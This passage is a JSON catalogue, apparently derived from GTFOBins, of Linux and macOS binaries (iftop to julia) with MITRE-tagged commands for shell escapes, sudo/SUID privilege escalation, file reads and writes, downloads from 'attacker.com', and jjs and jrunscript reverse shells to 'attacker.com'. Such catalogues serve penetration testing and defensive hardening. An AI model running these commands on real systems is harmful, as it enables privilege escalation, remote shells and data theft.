the privilege to capture on some device (specify with `-i` if needed).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/iftop/"]},{"id":"gtfo:install:privilege-escalation:0:sudo","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/install/"]},{"id":"gtfo:install:privilege-escalation:0:suid","toolId":"gtfo:install","toolName":"install","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"install -m 6777 /path/to/input-file /path/to/output-dir/","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/install/"]},{"id":"gtfo:ionice:shell:0:sudo","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ionice/"]},{"id":"gtfo:ionice:shell:0:suid","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ionice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ionice/"]},{"id":"gtfo:ionice:shell:0:unprivileged","toolId":"gtfo:ionice","toolName":"ionice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ionice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ionice/"]},{"id":"gtfo:ip:file-read:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:file-read:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:file-read:0:unprivileged","toolId":"gtfo:ip","toolName":"ip","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ip -force -batch /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:shell:0:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh\nip netns delete foo","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:shell:0:suid","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/sh -p\nip netns delete foo","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:ip:shell:1:sudo","toolId":"gtfo:ip","toolName":"ip","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ip netns add foo\nip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar\nip netns exec bar /bin/sh\nip netns delete foo\nip netns delete bar","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ip/"]},{"id":"gtfo:iptables-save:file-write:0:sudo","toolId":"gtfo:iptables-save","toolName":"iptables-save","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"iptables -A INPUT -i lo -j ACCEPT -m comment --comment DATA\niptables -S\niptables-save -f /path/to/output-file","description":"The content is written along with a number of `iptables` rules.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/iptables-save/"]},{"id":"gtfo:irb:inherit:0:sudo","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/irb/"]},{"id":"gtfo:irb:inherit:0:unprivileged","toolId":"gtfo:irb","toolName":"irb","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"irb\n...","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/irb/"]},{"id":"gtfo:ispell:shell:0:sudo","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ispell/"]},{"id":"gtfo:ispell:shell:0:suid","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ispell/"]},{"id":"gtfo:ispell:shell:0:unprivileged","toolId":"gtfo:ispell","toolName":"ispell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ispell /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ispell/"]},{"id":"gtfo:java:shell:0:sudo","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/java/"]},{"id":"gtfo:java:shell:0:unprivileged","toolId":"gtfo:java","toolName":"java","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"java Shell","description":"The `Shell.class` class file can be compiled offline, then uploaded to the target:\n\n```\ncat >Shell.java <<EOF\npublic class Shell {\n public static void main(String[] args) throws Exception {\n new ProcessBuilder(\"/bin/sh\").inheritIO().start().waitFor();\n }\n}\nEOF\n\njavac Shell.java\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/java/"]},{"id":"gtfo:jjs:download:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:download:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"jjs\nvar URL = Java.type('java.net.URL');\nvar ws = new URL('http://attacker.com/path/to/input-file');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('/path/to/output-file');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-read:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-read:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jjs\nvar BufferedReader = Java.type('java.io.BufferedReader');\nvar FileReader = Java.type('java.io.FileReader');\nvar br = new BufferedReader(new FileReader('/path/to/input-file'));\nwhile ((line = br.readLine()) != null) { print(line); }","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-write:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:file-write:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jjs\nvar FileWriter = Java.type('java.io.FileWriter');\nvar fw=new FileWriter('/path/to/output-file');\nfw.write('DATA');\nfw.close();","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:reverse-shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:reverse-shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jjs\nvar host='attacker.com';\nvar port=12345;\nvar ProcessBuilder = Java.type('java.lang.ProcessBuilder');\nvar p=new ProcessBuilder('/bin/sh', '-i').redirectErrorStream(true).start();\nvar Socket = Java.type('java.net.Socket');\nvar s=new Socket(host,port);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type('java.lang.Thread').sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:shell:0:sudo","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:jjs:shell:0:unprivileged","toolId":"gtfo:jjs","toolName":"jjs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jjs\nJava.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty').waitFor()","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jjs/"]},{"id":"gtfo:joe:shell:0:sudo","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/joe/"]},{"id":"gtfo:joe:shell:0:suid","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/joe/"]},{"id":"gtfo:joe:shell:0:unprivileged","toolId":"gtfo:joe","toolName":"joe","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"joe\n^K!/bin/sh","description":"The terminal is spawn int the terminal interface.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/joe/"]},{"id":"gtfo:join:file-read:0:sudo","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/join/"]},{"id":"gtfo:join:file-read:0:suid","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/join/"]},{"id":"gtfo:join:file-read:0:unprivileged","toolId":"gtfo:join","toolName":"join","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"join -a 2 /dev/null /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/join/"]},{"id":"gtfo:journalctl:inherit:0:sudo","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/journalctl/"]},{"id":"gtfo:journalctl:inherit:0:unprivileged","toolId":"gtfo:journalctl","toolName":"journalctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"journalctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/journalctl/"]},{"id":"gtfo:jq:file-read:0:sudo","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jq/"]},{"id":"gtfo:jq:file-read:0:suid","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jq/"]},{"id":"gtfo:jq:file-read:0:unprivileged","toolId":"gtfo:jq","toolName":"jq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jq -Rr . /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jq/"]},{"id":"gtfo:jrunscript:download:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:download:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"jrunscript -e 'cp(\"http://attacker.com/path/to/input-file\",\"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-read:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-read:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"/path/to/input-file\"));\n while ((line = br.readLine()) != null) { print(line); }'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-write:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:file-write:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jrunscript -e 'var fw=new java.io.FileWriter(\"/path/to/output-file\");\n fw.write(\"DATA\");\n fw.close();'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:reverse-shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:reverse-shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"jrunscript -e 'var host=\"attacker.com\";\n var port=12345;\n var p=new java.lang.ProcessBuilder(\"/bin/sh\", \"-i\").redirectErrorStream(true).start();\n var s=new java.net.Socket(host,port);\n var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\n var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\n while(pi.available()>0)so.write(pi.read());\n while(pe.available()>0)so.write(pe.read());\n while(si.available()>0)po.write(si.read());\n so.flush();po.flush();\n java.lang.Thread.sleep(50);\n try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:shell:0:sudo","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:shell:0:suid","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/tty >/dev/tty 2>/dev/tty\")'","description":"This has been found working in macOS but failing on Linux systems.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jrunscript:shell:0:unprivileged","toolId":"gtfo:jrunscript","toolName":"jrunscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jrunscript -e 'exec(\"/bin/sh -c $@|sh _ echo sh </dev/tty >/dev/tty 2>/dev/tty\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jrunscript/"]},{"id":"gtfo:jshell:file-read:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:file-read:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"jshell\njshell> /open /path/to/input-file","description":"The content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:file-write:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:file-write:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"jshell\nString x = \"DATA\";\n/save /path/to/output-file","description":"Writes only the valid Java code to file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:shell:0:sudo","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jshell:shell:0:unprivileged","toolId":"gtfo:jshell","toolName":"jshell","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jshell\nRuntime.getRuntime().exec(\"/path/to/command\");","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jshell/"]},{"id":"gtfo:jtag:shell:0:sudo","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/jtag/"]},{"id":"gtfo:jtag:shell:0:unprivileged","toolId":"gtfo:jtag","toolName":"jtag","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"jtag --interactive\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/jtag/"]},{"id":"gtfo:julia:download:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:download:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:download:0:unprivileged","toolId":"gtfo:julia","toolName":"julia","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"julia -e 'download(\"http://attacker.com/path/to/input-file\", \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-read:0:sudo","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), \"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/julia/"]},{"id":"gtfo:julia:file-read:0:suid","toolId":"gtfo:julia","toolName":"julia","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"julia -e 'print(open(f->read(f, String), 